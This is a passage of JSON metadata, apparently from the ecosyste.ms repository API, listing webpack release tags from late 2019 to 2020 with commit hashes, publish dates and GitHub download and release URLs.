api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha"